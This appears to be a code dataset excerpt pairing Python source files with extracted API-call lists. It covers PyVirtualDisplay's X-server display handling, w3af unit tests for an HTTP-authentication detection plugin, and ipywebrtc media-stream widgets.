        #     rp, wp = os.pipe()
        #     fcntl.fcntl(rp, fcntl.F_SETFD, fcntl.FD_CLOEXEC)
        #     # TODO: to properly allow to inherit fds to subprocess on
        #     # python 3.2+ the easyprocess needs small fix..
        #     fcntl.fcntl(wp, fcntl.F_SETFD, 0)
        #     self.check_startup_fd = wp
        #     self._check_startup_fd = rp
        # self.proc = EasyProcess(self._cmd())
    def _check_flags(self, helptext):
        """Hook for subclasses to validate program-specific flags."""
        pass
    def _cmd(self):
        """Subclasses must return the command (list) used to start the server."""
        raise NotImplementedError()
    def _redirect_display(self, on):
        """
        on:
        * True -> set $DISPLAY to virtual screen
        * False -> set $DISPLAY to original screen

        :param on: bool
        """
        d = self.new_display_var if on else self.old_display_var
        if d is None:
            log.debug("unset $DISPLAY")
            try:
                del os.environ["DISPLAY"]
            except KeyError:
                log.warning("$DISPLAY was already unset.")
        else:
            log.debug("$DISPLAY=%s", d)
            os.environ["DISPLAY"] = d
    def start(self):
        """
        start display

        NOTE(review): despite ":rtype: self" below, this method returns
        None (only _start1 returns self) -- confirm whether callers rely
        on chaining.

        :rtype: self
        """
        if self.is_started:
            raise XStartError(self, "Display was started twice.")
        self.is_started = True
        if self._has_displayfd:
            # The server tells us its display number -> single attempt.
            self._start1()
        else:
            # We guessed a display number; retry on collision/failure.
            i = 0
            while True:
                try:
                    self._start1()
                    break
                except XStartError:
                    log.warning("start failed %s", i + 1)
                    time.sleep(0.05)
                    i += 1
                    if i >= self._retries:
                        raise XStartError(
                            "No success after %s retries. Last stderr: %s"
                            % (self._retries, self.stderr)
                        )
                finally:
                    self._redirect_display(False)
        self._redirect_display(True)
    def _start1(self):
        """Single start attempt: spawn the server and wait until it is up."""
        if self._has_displayfd:
            # stdout doesn't work on osx -> create own pipe
            rfd, self._pipe_wfd = os.pipe()
        else:
            # Reserve a display number ourselves, under the module mutex so
            # concurrent starts in this process don't collide.
            with _mutex:
                self.display = _search_for_display(randomizer=self._randomizer)
                while self.display in _USED_DISPLAY_NR_LIST:
                    self.display += 1
                self.new_display_var = ":%s" % int(self.display)
                _USED_DISPLAY_NR_LIST.append(self.display)
        self._command = self._cmd() + self._extra_args
        log.debug("command: %s", self._command)
        self._stdout_file = tempfile.TemporaryFile(prefix="stdout_")
        self._stderr_file = tempfile.TemporaryFile(prefix="stderr_")
        if py2() or not self._has_displayfd:
            self._subproc = subprocess.Popen(
                self._command,
                stdout=self._stdout_file,
                stderr=self._stderr_file,
                shell=False,
            )
        else:
            if self._has_displayfd:
                # pass_fds hands the write end of our pipe to the X server
                # so it can report the display number (py3 only).
                self._subproc = subprocess.Popen(
                    self._command,
                    pass_fds=[self._pipe_wfd],
                    stdout=self._stdout_file,
                    stderr=self._stderr_file,
                    shell=False,
                )
        if self._has_displayfd:
            # rfd = self.subproc.stdout.fileno()
            self.display = int(self._wait_for_pipe_text(rfd))
            os.close(rfd)
            os.close(self._pipe_wfd)
            self.new_display_var = ":%s" % int(self.display)
        if self._use_xauth:
            self._setup_xauth()
        # https://github.com/ponty/PyVirtualDisplay/issues/2
        # https://github.com/ponty/PyVirtualDisplay/issues/14
        self.old_display_var = os.environ.get("DISPLAY", None)
        # wait until X server is active
        start_time = time.time()
        # if self.check_startup:
        #     rp = self._check_startup_fd
        #     display_check = None
        #     rlist, wlist, xlist = select.select((rp,), (), (), _X_START_TIMEOUT)
        #     if rlist:
        #         display_check = os.read(rp, 10).rstrip()
        #     else:
        #         msg = "No display number returned by X server"
        #         raise XStartTimeoutError(msg)
        #     dnbs = str(self.display)
        #     if bytes != str:
        #         dnbs = bytes(dnbs, "ascii")
        #     if display_check != dnbs:
        #         msg = 'Display number "%s" not returned by X server' + str(
        #             display_check
        #         )
        #         raise XStartTimeoutError(msg % self.display)
        if not self._has_displayfd:
            # No displayfd: poll the guessed display with xdpyinfo until it
            # answers, the timeout elapses, or the server process dies.
            self._redirect_display(True)  # for xdpyinfo
            d = self.new_display_var
            ok = False
            time.sleep(0.05)  # give time for early exit
            while True:
                if not self.is_alive():
                    break
                try:
                    xdpyinfo = EasyProcess(["xdpyinfo"])
                    xdpyinfo.enable_stdout_log = False
                    xdpyinfo.enable_stderr_log = False
                    exit_code = xdpyinfo.call().return_code
                except EasyProcessError:
                    log.warning(
                        "xdpyinfo was not found, X start can not be checked! Please install xdpyinfo!"
                    )
                    time.sleep(_X_START_WAIT)  # old method
                    ok = True
                    break
                if exit_code != 0:
                    # X not answering yet; keep polling.
                    pass
                else:
                    log.info('Successfully started X with display "%s".', d)
                    ok = True
                    break
                if time.time() - start_time >= _X_START_TIMEOUT:
                    break
                time.sleep(_X_START_TIME_STEP)
            if not self.is_alive():
                log.warning("process exited early. stderr:%s", self.stderr)
                msg = "Failed to start process: %s"
                raise XStartError(msg % self)
            if not ok:
                msg = 'Failed to start X on display "%s" (xdpyinfo check failed, stderr:[%s]).'
                raise XStartTimeoutError(msg % (d, xdpyinfo.stderr))
        return self
    def _wait_for_pipe_text(self, rfd):
        """Read an ascii line (the display number) from fd *rfd*.

        Raises XStartError if the server dies, XStartTimeoutError if no
        newline-terminated reply arrives within _X_START_TIMEOUT seconds.
        """
        s = ""
        start_time = time.time()
        while True:
            (rfd_changed_ls, _, _) = select.select([rfd], [], [], 0.1)
            if not self.is_alive():
                raise XStartError(
                    "%s program closed. command: %s stderr: %s"
                    % (self._program, self._command, self.stderr)
                )
            if rfd in rfd_changed_ls:
                c = os.read(rfd, 1)
                if c == b"\n":
                    break
                s += c.decode("ascii")
            if time.time() - start_time >= _X_START_TIMEOUT:
                raise XStartTimeoutError(
                    "No reply from program %s. command:%s"
                    % (self._program, self._command,)
                )
        return s
    def stop(self):
        """
        stop display

        :rtype: self
        """
        if not self.is_started:
            raise XStartError("stop() is called before start().")
        self._redirect_display(False)
        if self.is_alive():
            try:
                try:
                    self._subproc.terminate()
                except AttributeError:
                    # Very old Python/Popen without terminate(): hard-kill.
                    os.kill(self._subproc.pid, signal.SIGKILL)
            except OSError as oserror:
                log.debug("exception in terminate:%s", oserror)
            self._subproc.wait()
            self._read_stdout_stderr()
        if self._use_xauth:
            self._clear_xauth()
        return self
    def _read_stdout_stderr(self):
        """Capture the subprocess output once; idempotent after first call."""
        if self.stdout is None:
            self._stdout_file.seek(0)
            self._stderr_file.seek(0)
            self.stdout = self._stdout_file.read()
            self.stderr = self._stderr_file.read()
            self._stdout_file.close()
            self._stderr_file.close()
            log.debug("stdout=%s", self.stdout)
            log.debug("stderr=%s", self.stderr)
    def _setup_xauth(self):
        """
        Set up the Xauthority file and the XAUTHORITY environment variable.
        """
        handle, filename = tempfile.mkstemp(
            prefix="PyVirtualDisplay.", suffix=".Xauthority"
        )
        self._xauth_filename = filename
        os.close(handle)
        # Save old environment
        self._old_xauth = {}
        self._old_xauth["AUTHFILE"] = os.getenv("AUTHFILE")
        self._old_xauth["XAUTHORITY"] = os.getenv("XAUTHORITY")
        os.environ["AUTHFILE"] = os.environ["XAUTHORITY"] = filename
        cookie = xauth.generate_mcookie()
        xauth.call("add", self.new_display_var, ".", cookie)
    def _clear_xauth(self):
        """
        Clear the Xauthority file and restore the environment variables.
        """
        os.remove(self._xauth_filename)
        for varname in ["AUTHFILE", "XAUTHORITY"]:
            if self._old_xauth[varname] is None:
                del os.environ[varname]
            else:
                os.environ[varname] = self._old_xauth[varname]
        self._old_xauth = None
    def __enter__(self):
        """used by the :keyword:`with` statement"""
        self.start()
        return self
    def __exit__(self, *exc_info):
        """used by the :keyword:`with` statement"""
        self.stop()
    def is_alive(self):
        """Return True while the X server subprocess is still running."""
        return self.return_code is None
    @property
    def return_code(self):
        """Exit code of the subprocess, or None while it is still running."""
        rc = self._subproc.poll()
        if rc is not None:
            # proc exited
            self._read_stdout_stderr()
        return rc
    @property
    def pid(self):
        """
        PID (:attr:`subprocess.Popen.pid`)

        :rtype: int
        """
        if self._subproc:
            return self._subproc.pid
| [
"logging.getLogger",
"time.sleep",
"pyvirtualdisplay.xauth.call",
"os.read",
"pyvirtualdisplay.util.py2",
"os.remove",
"os.kill",
"os.listdir",
"pyvirtualdisplay.xauth.generate_mcookie",
"threading.Lock",
"subprocess.Popen",
"select.select",
"os.close",
"os.path.isfile",
"time.time",
"... | [((363, 369), 'threading.Lock', 'Lock', ([], {}), '()\n', (367, 369), False, 'from threading import Lock\n'), ((377, 404), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (394, 404), False, 'import logging\n'), ((816, 843), 'fnmatch.filter', 'fnmatch.filter', (['ls', 'pattern'], {}), '(ls, pattern)\n', (830, 843), False, 'import fnmatch\n'), ((676, 694), 'os.listdir', 'os.listdir', (['tmpdir'], {}), '(tmpdir)\n', (686, 694), False, 'import os\n'), ((854, 881), 'os.path.join', 'os.path.join', (['tmpdir', 'child'], {}), '(tmpdir, child)\n', (866, 881), False, 'import os\n'), ((1825, 1846), 'pyvirtualdisplay.util.get_helptext', 'get_helptext', (['program'], {}), '(program)\n', (1837, 1846), False, 'from pyvirtualdisplay.util import get_helptext, py2\n'), ((5496, 5536), 'tempfile.TemporaryFile', 'tempfile.TemporaryFile', ([], {'prefix': '"""stdout_"""'}), "(prefix='stdout_')\n", (5518, 5536), False, 'import tempfile\n'), ((5565, 5605), 'tempfile.TemporaryFile', 'tempfile.TemporaryFile', ([], {'prefix': '"""stderr_"""'}), "(prefix='stderr_')\n", (5587, 5605), False, 'import tempfile\n'), ((6660, 6691), 'os.environ.get', 'os.environ.get', (['"""DISPLAY"""', 'None'], {}), "('DISPLAY', None)\n", (6674, 6691), False, 'import os\n'), ((6754, 6765), 'time.time', 'time.time', ([], {}), '()\n', (6763, 6765), False, 'import time\n'), ((9244, 9255), 'time.time', 'time.time', ([], {}), '()\n', (9253, 9255), False, 'import time\n'), ((11259, 11325), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'prefix': '"""PyVirtualDisplay."""', 'suffix': '""".Xauthority"""'}), "(prefix='PyVirtualDisplay.', suffix='.Xauthority')\n", (11275, 11325), False, 'import tempfile\n'), ((11396, 11412), 'os.close', 'os.close', (['handle'], {}), '(handle)\n', (11404, 11412), False, 'import os\n'), ((11511, 11532), 'os.getenv', 'os.getenv', (['"""AUTHFILE"""'], {}), "('AUTHFILE')\n", (11520, 11532), False, 'import os\n'), ((11573, 11596), 'os.getenv', 'os.getenv', 
(['"""XAUTHORITY"""'], {}), "('XAUTHORITY')\n", (11582, 11596), False, 'import os\n'), ((11684, 11708), 'pyvirtualdisplay.xauth.generate_mcookie', 'xauth.generate_mcookie', ([], {}), '()\n', (11706, 11708), False, 'from pyvirtualdisplay import xauth\n'), ((11717, 11769), 'pyvirtualdisplay.xauth.call', 'xauth.call', (['"""add"""', 'self.new_display_var', '"""."""', 'cookie'], {}), "('add', self.new_display_var, '.', cookie)\n", (11727, 11769), False, 'from pyvirtualdisplay import xauth\n'), ((11904, 11935), 'os.remove', 'os.remove', (['self._xauth_filename'], {}), '(self._xauth_filename)\n', (11913, 11935), False, 'import os\n'), ((929, 946), 'os.path.isfile', 'os.path.isfile', (['p'], {}), '(p)\n', (943, 946), False, 'import os\n'), ((2353, 2374), 'pyvirtualdisplay.xauth.NotFoundError', 'xauth.NotFoundError', ([], {}), '()\n', (2372, 2374), False, 'from pyvirtualdisplay import xauth\n'), ((5010, 5019), 'os.pipe', 'os.pipe', ([], {}), '()\n', (5017, 5019), False, 'import os\n'), ((5618, 5623), 'pyvirtualdisplay.util.py2', 'py2', ([], {}), '()\n', (5621, 5623), False, 'from pyvirtualdisplay.util import get_helptext, py2\n'), ((5680, 5781), 'subprocess.Popen', 'subprocess.Popen', (['self._command'], {'stdout': 'self._stdout_file', 'stderr': 'self._stderr_file', 'shell': '(False)'}), '(self._command, stdout=self._stdout_file, stderr=self.\n _stderr_file, shell=False)\n', (5696, 5781), False, 'import subprocess\n'), ((6336, 6349), 'os.close', 'os.close', (['rfd'], {}), '(rfd)\n', (6344, 6349), False, 'import os\n'), ((6362, 6386), 'os.close', 'os.close', (['self._pipe_wfd'], {}), '(self._pipe_wfd)\n', (6370, 6386), False, 'import os\n'), ((7694, 7710), 'time.sleep', 'time.sleep', (['(0.05)'], {}), '(0.05)\n', (7704, 7710), False, 'import time\n'), ((9313, 9346), 'select.select', 'select.select', (['[rfd]', '[]', '[]', '(0.1)'], {}), '([rfd], [], [], 0.1)\n', (9326, 9346), False, 'import select\n'), ((2313, 2333), 'pyvirtualdisplay.xauth.is_installed', 
'xauth.is_installed', ([], {}), '()\n', (2331, 2333), False, 'from pyvirtualdisplay import xauth\n'), ((5938, 6066), 'subprocess.Popen', 'subprocess.Popen', (['self._command'], {'pass_fds': '[self._pipe_wfd]', 'stdout': 'self._stdout_file', 'stderr': 'self._stderr_file', 'shell': '(False)'}), '(self._command, pass_fds=[self._pipe_wfd], stdout=self.\n _stdout_file, stderr=self._stderr_file, shell=False)\n', (5954, 6066), False, 'import subprocess\n'), ((8717, 8747), 'time.sleep', 'time.sleep', (['_X_START_TIME_STEP'], {}), '(_X_START_TIME_STEP)\n', (8727, 8747), False, 'import time\n'), ((9624, 9639), 'os.read', 'os.read', (['rfd', '(1)'], {}), '(rfd, 1)\n', (9631, 9639), False, 'import os\n'), ((7882, 7907), 'easyprocess.EasyProcess', 'EasyProcess', (["['xdpyinfo']"], {}), "(['xdpyinfo'])\n", (7893, 7907), False, 'from easyprocess import EasyProcess, EasyProcessError\n'), ((9751, 9762), 'time.time', 'time.time', ([], {}), '()\n', (9760, 9762), False, 'import time\n'), ((4458, 4474), 'time.sleep', 'time.sleep', (['(0.05)'], {}), '(0.05)\n', (4468, 4474), False, 'import time\n'), ((8297, 8322), 'time.sleep', 'time.sleep', (['_X_START_WAIT'], {}), '(_X_START_WAIT)\n', (8307, 8322), False, 'import time\n'), ((8629, 8640), 'time.time', 'time.time', ([], {}), '()\n', (8638, 8640), False, 'import time\n'), ((10384, 10426), 'os.kill', 'os.kill', (['self._subproc.pid', 'signal.SIGKILL'], {}), '(self._subproc.pid, signal.SIGKILL)\n', (10391, 10426), False, 'import os\n')] |
"""
test_http_auth_detect.py
Copyright 2012 <NAME>
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import unittest
import w3af.core.data.kb.knowledge_base as kb
from w3af.core.data.url.HTTPResponse import HTTPResponse
from w3af.core.data.request.fuzzable_request import FuzzableRequest
from w3af.core.data.parsers.doc.url import URL
from w3af.core.data.dc.headers import Headers
from w3af.plugins.grep.http_auth_detect import http_auth_detect
class test_http_auth_detect(unittest.TestCase):
    """Tests for the http_auth_detect grep plugin: auth headers, non-RFC
    401 responses, and user:password@host URIs embedded in bodies."""
    def setUp(self):
        # Fresh request/plugin pair and a clean knowledge base per test.
        self.url = URL('http://www.w3af.com/')
        self.headers = Headers({'content-type': 'text/html'}.items())
        self.request = FuzzableRequest(self.url, method='GET')
        self.plugin = http_auth_detect()
        kb.kb.cleanup()
    def tearDown(self):
        self.plugin.end()
    def test_http_auth_detect_negative(self):
        # Plain 200 response with an empty body: nothing should be reported.
        response = HTTPResponse(200, '', self.headers, self.url, self.url, _id=1)
        self.plugin.grep(self.request, response)
        self.assertEqual(len(kb.kb.get('http_auth_detect', 'auth')), 0)
        self.assertEqual(len(kb.kb.get('http_auth_detect', 'userPassUri')), 0)
    def test_http_auth_detect_negative_long(self):
        # Large benign body: still no findings expected.
        body = 'ABC ' * 10000
        response = HTTPResponse(200, body, self.headers, self.url, self.url, _id=1)
        self.plugin.grep(self.request, response)
        self.assertEqual(len(kb.kb.get('http_auth_detect', 'auth')), 0)
        self.assertEqual(len(kb.kb.get('http_auth_detect', 'userPassUri')), 0)
    def test_http_auth_detect_uri(self):
        # Body embeds a user:password@host URI -> one 'userPassUri' finding.
        body = 'ABC ' * 100
        body += '<a href="http://abc:def@www.w3af.com/foo.bar">test</a>'
        body += '</br> ' * 50
        response = HTTPResponse(200, body, self.headers, self.url, self.url, _id=1)
        self.plugin.grep(self.request, response)
        self.assertEqual(len(kb.kb.get('http_auth_detect', 'auth')), 0)
        self.assertEqual(len(kb.kb.get('http_auth_detect', 'userPassUri')), 1)
    def test_http_auth_detect_non_rfc(self):
        # 401 without a www-authenticate header -> counted as non-RFC auth.
        body = ''
        response = HTTPResponse(401, body, self.headers, self.url, self.url, _id=1)
        self.plugin.grep(self.request, response)
        self.assertEqual(
            len(kb.kb.get('http_auth_detect', 'non_rfc_auth')), 1)
        self.assertEqual(len(kb.kb.get('http_auth_detect', 'userPassUri')), 0)
    def test_http_auth_detect_simple(self):
        # Proper 401 carrying a www-authenticate header -> one 'auth' finding.
        body = ''
        hdrs = {'content-type': 'text/html', 'www-authenticate': 'realm-w3af'}
        hdrs = Headers(hdrs.items())
        response = HTTPResponse(401, body, hdrs, self.url, self.url, _id=1)
        self.plugin.grep(self.request, response)
        self.assertEqual(len(kb.kb.get('http_auth_detect', 'auth')), 1)
        self.assertEqual(len(kb.kb.get('http_auth_detect', 'userPassUri')), 0)
| [
"w3af.core.data.kb.knowledge_base.kb.cleanup",
"w3af.core.data.kb.knowledge_base.kb.get",
"w3af.core.data.url.HTTPResponse.HTTPResponse",
"w3af.core.data.parsers.doc.url.URL",
"w3af.core.data.request.fuzzable_request.FuzzableRequest",
"w3af.plugins.grep.http_auth_detect.http_auth_detect"
] | [((1147, 1174), 'w3af.core.data.parsers.doc.url.URL', 'URL', (['"""http://www.w3af.com/"""'], {}), "('http://www.w3af.com/')\n", (1150, 1174), False, 'from w3af.core.data.parsers.doc.url import URL\n'), ((1268, 1307), 'w3af.core.data.request.fuzzable_request.FuzzableRequest', 'FuzzableRequest', (['self.url'], {'method': '"""GET"""'}), "(self.url, method='GET')\n", (1283, 1307), False, 'from w3af.core.data.request.fuzzable_request import FuzzableRequest\n'), ((1330, 1348), 'w3af.plugins.grep.http_auth_detect.http_auth_detect', 'http_auth_detect', ([], {}), '()\n', (1346, 1348), False, 'from w3af.plugins.grep.http_auth_detect import http_auth_detect\n'), ((1357, 1372), 'w3af.core.data.kb.knowledge_base.kb.cleanup', 'kb.kb.cleanup', ([], {}), '()\n', (1370, 1372), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((1490, 1552), 'w3af.core.data.url.HTTPResponse.HTTPResponse', 'HTTPResponse', (['(200)', '""""""', 'self.headers', 'self.url', 'self.url'], {'_id': '(1)'}), "(200, '', self.headers, self.url, self.url, _id=1)\n", (1502, 1552), False, 'from w3af.core.data.url.HTTPResponse import HTTPResponse\n'), ((1854, 1918), 'w3af.core.data.url.HTTPResponse.HTTPResponse', 'HTTPResponse', (['(200)', 'body', 'self.headers', 'self.url', 'self.url'], {'_id': '(1)'}), '(200, body, self.headers, self.url, self.url, _id=1)\n', (1866, 1918), False, 'from w3af.core.data.url.HTTPResponse import HTTPResponse\n'), ((2311, 2375), 'w3af.core.data.url.HTTPResponse.HTTPResponse', 'HTTPResponse', (['(200)', 'body', 'self.headers', 'self.url', 'self.url'], {'_id': '(1)'}), '(200, body, self.headers, self.url, self.url, _id=1)\n', (2323, 2375), False, 'from w3af.core.data.url.HTTPResponse import HTTPResponse\n'), ((2659, 2723), 'w3af.core.data.url.HTTPResponse.HTTPResponse', 'HTTPResponse', (['(401)', 'body', 'self.headers', 'self.url', 'self.url'], {'_id': '(1)'}), '(401, body, self.headers, self.url, self.url, _id=1)\n', (2671, 2723), False, 'from 
w3af.core.data.url.HTTPResponse import HTTPResponse\n'), ((3143, 3199), 'w3af.core.data.url.HTTPResponse.HTTPResponse', 'HTTPResponse', (['(401)', 'body', 'hdrs', 'self.url', 'self.url'], {'_id': '(1)'}), '(401, body, hdrs, self.url, self.url, _id=1)\n', (3155, 3199), False, 'from w3af.core.data.url.HTTPResponse import HTTPResponse\n'), ((1631, 1668), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""auth"""'], {}), "('http_auth_detect', 'auth')\n", (1640, 1668), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((1703, 1747), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""userPassUri"""'], {}), "('http_auth_detect', 'userPassUri')\n", (1712, 1747), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((1997, 2034), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""auth"""'], {}), "('http_auth_detect', 'auth')\n", (2006, 2034), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((2069, 2113), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""userPassUri"""'], {}), "('http_auth_detect', 'userPassUri')\n", (2078, 2113), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((2454, 2491), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""auth"""'], {}), "('http_auth_detect', 'auth')\n", (2463, 2491), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((2526, 2570), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""userPassUri"""'], {}), "('http_auth_detect', 'userPassUri')\n", (2535, 2570), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((2815, 2860), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""non_rfc_auth"""'], {}), "('http_auth_detect', 'non_rfc_auth')\n", (2824, 2860), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((2895, 2939), 
'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""userPassUri"""'], {}), "('http_auth_detect', 'userPassUri')\n", (2904, 2939), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((3278, 3315), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""auth"""'], {}), "('http_auth_detect', 'auth')\n", (3287, 3315), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((3350, 3394), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""userPassUri"""'], {}), "('http_auth_detect', 'userPassUri')\n", (3359, 3394), True, 'import w3af.core.data.kb.knowledge_base as kb\n')] |
from __future__ import absolute_import
import os
import logging
try:
from urllib import urlopen # py2
except ImportError:
from urllib.request import urlopen # py3
from traitlets import (
observe,
Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate
)
from ipywidgets import DOMWidget, Image, register, widget_serialization
from ipython_genutils.py3compat import string_types
import ipywebrtc._version
import traitlets
import ipywidgets as widgets
logger = logging.getLogger("jupyter-webrtc")
# Frontend (JavaScript) version range this Python package is compatible with.
semver_range_frontend = "~" + ipywebrtc._version.__version_js__
@register
class MediaStream(DOMWidget):
    """Represents a media source.
    See https://developer.mozilla.org/nl/docs/Web/API/MediaStream for details
    In practice this can be a stream coming from an HTMLVideoElement,
    HTMLCanvasElement (could be a WebGL canvas) or a camera/webcam/microphone
    using getUserMedia.
    """
    # Module/model/view wiring that tells ipywidgets which frontend
    # (JavaScript) classes back this Python model.
    _model_module = Unicode('jupyter-webrtc').tag(sync=True)
    _view_module = Unicode('jupyter-webrtc').tag(sync=True)
    _view_name = Unicode('MediaStreamView').tag(sync=True)
    _model_name = Unicode('MediaStreamModel').tag(sync=True)
    _view_module_version = Unicode(semver_range_frontend).tag(sync=True)
    _model_module_version = Unicode(semver_range_frontend).tag(sync=True)
# for backwards compatibility with ipyvolume
HasStream = MediaStream  # deprecated alias; prefer MediaStream
@register
class WidgetStream(MediaStream):
    """Represents a widget media source.
    """
    _model_name = Unicode('WidgetStreamModel').tag(sync=True)
    _view_name = Unicode('WidgetStreamView').tag(sync=True)
    # The widget whose rendered view is captured as a stream.
    widget = Instance(DOMWidget, allow_none=False).tag(sync=True, **widget_serialization)
    # Maximum capture rate; None means unconstrained.
    max_fps = Int(None, allow_none=True).tag(sync=True)
    @validate('max_fps')
    def _valid_fps(self, proposal):
        # NOTE(review): the check permits 0 although the message says
        # "positive" -- confirm whether max_fps=0 is intentionally allowed.
        if proposal['value'] is not None and proposal['value'] < 0:
            raise TraitError('max_fps attribute must be a positive integer')
        return proposal['value']
class ImageStream(MediaStream):
    """Represent a media stream by a static image"""
    # NOTE(review): unlike the sibling stream classes this one is not
    # decorated with @register -- confirm whether that is intentional.
    _model_name = Unicode('ImageStreamModel').tag(sync=True)
    # The ipywidgets Image whose data backs the stream.
    image = Instance(Image).tag(sync=True, **widget_serialization)
@register
class VideoStream(MediaStream):
    """Represents a media source by a video.
    The `value` of this widget accepts a byte string. The byte string is the
    raw video data that you want the browser to display. You can explicitly
    define the format of the byte string using the `format` trait (which
    defaults to 'mp4').
    If you pass `"url"` to the `"format"` trait, `value` will be interpreted
    as a URL as bytes encoded in ascii.
    """
    _model_name = Unicode('VideoStreamModel').tag(sync=True)
    # Container format of ``value`` (e.g. 'mp4', 'webm'), or the special
    # value 'url' (``value`` then holds an ascii-encoded URL).
    format = Unicode('mp4', help="The format of the video.").tag(sync=True)
    value = Bytes(None, allow_none=True, help="The video data as a byte string.").tag(sync=True)
    play = Bool(True, help='Play video or pause it').tag(sync=True)
    loop = Bool(True, help='When true, the video will start from the beginning after finishing').tag(sync=True)
    @classmethod
    def from_file(cls, f, **kwargs):
        """Create a `VideoStream` from a local file or file object.
        Parameters
        ----------
        f: str or file
            The path or file object that will be read and its bytes assigned
            to the value trait.
        **kwargs:
            Extra keyword arguments for `VideoStream`
        Returns an `VideoStream` with the value set from the content of a file.
        """
        if isinstance(f, string_types):
            with open(f, 'rb') as f:
                return cls(value=f.read(), **kwargs)
        else:
            if 'format' not in kwargs:
                # Bug fix: on this branch ``f`` is a file *object*, not a
                # path, so derive the extension from its ``name`` attribute
                # (empty when absent, e.g. for BytesIO) instead of passing
                # the object itself to os.path.splitext, which raised
                # TypeError.
                ext = os.path.splitext(getattr(f, 'name', ''))[1]
                if ext:
                    kwargs['format'] = ext[1:]  # remove the .
            return cls(value=f.read(), **kwargs)
    @classmethod
    def from_url(cls, url, **kwargs):
        """Create a `VideoStream` from a url.
        This will set the .value trait to the url, and the .format trait to
        'url'
        Parameters
        ----------
        url: str
            The url of the file that will be assigned to the value trait.
        **kwargs:
            Extra keyword arguments for `VideoStream`
        Returns an `VideoStream` with the value set to the url.
        """
        kwargs = dict(kwargs)
        kwargs['format'] = 'url'
        # for now we only support ascii
        return cls(value=url.encode('ascii'), **kwargs)
    @classmethod
    def from_download(cls, url, **kwargs):
        """Create a `VideoStream` from a url by downloading
        Parameters
        ----------
        url: str
            The url of the file that will be downloadeded and its bytes
            assigned to the value trait.
        **kwargs:
            Extra keyword arguments for `VideoStream`
        Returns an `VideoStream` with the value set from the content of a url.
        """
        if 'format' not in kwargs:
            ext = os.path.splitext(url)[1]
            if ext:
                kwargs = dict(kwargs)
                kwargs['format'] = ext[1:]  # remove the .
        return cls(value=urlopen(url).read(), **kwargs)
@register
class CameraStream(MediaStream):
    """Represents a media source by a camera/webcam/microphone using
    getUserMedia. See
    https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia
    for more detail.
    The constraints trait can be set to specify constraints for the camera or
    microphone, which is described in the documentation of getUserMedia, such
    as in the link above,
    Two convenience methods are available to easily get access to the 'front'
    and 'back' camera, when present
    >>> CameraStream.facing_user(audio=False)
    >>> CameraStream.facing_environment(audio=False)
    """
    _model_name = Unicode('CameraStreamModel').tag(sync=True)
    # Specify audio constraint and video constraint
    # see https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia
    constraints = Dict(
        {'audio': True, 'video': True},
        help='Constraints for the camera, see https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia for details'
    ).tag(sync=True)
    @classmethod
    def facing_user(cls, audio=True, **kwargs):
        """Convenience method to get the camera facing the user (often front)
        Parameters
        ----------
        audio: bool
            Capture audio or not
        kwargs:
            Extra keyword arguments passed to the `CameraStream`
        """
        return cls._facing(facing_mode='user', audio=audio, **kwargs)
    @classmethod
    def facing_environment(cls, audio=True, **kwargs):
        """Convenience method to get the camera facing the environment (often the back)
        Parameters
        ----------
        audio: bool
            Capture audio or not
        kwargs:
            Extra keyword arguments passed to the `CameraStream`
        """
        return cls._facing(facing_mode='environment', audio=audio, **kwargs)
    @staticmethod
    def _facing(facing_mode, audio=True, **kwargs):
        # Build a constraints dict without clobbering caller-supplied
        # 'audio'/'video' entries, then force the requested facingMode.
        kwargs = dict(kwargs)
        constraints = kwargs.pop('constraints', {})
        if 'audio' not in constraints:
            constraints['audio'] = audio
        if 'video' not in constraints:
            constraints['video'] = {}
        constraints['video']['facingMode'] = facing_mode
        return CameraStream(constraints=constraints, **kwargs)
def _memoryview_to_bytes(value, widget=None):
return bytes(value)
@register
class MediaRecorder(DOMWidget):
    """Records a MediaStream widget so the result can be played back in the
    notebook or downloaded.
    """
    _model_module = Unicode('jupyter-webrtc').tag(sync=True)
    _view_module = Unicode('jupyter-webrtc').tag(sync=True)
    _model_name = Unicode('MediaRecorderModel').tag(sync=True)
    _view_name = Unicode('MediaRecorderView').tag(sync=True)
    _view_module_version = Unicode(semver_range_frontend).tag(sync=True)
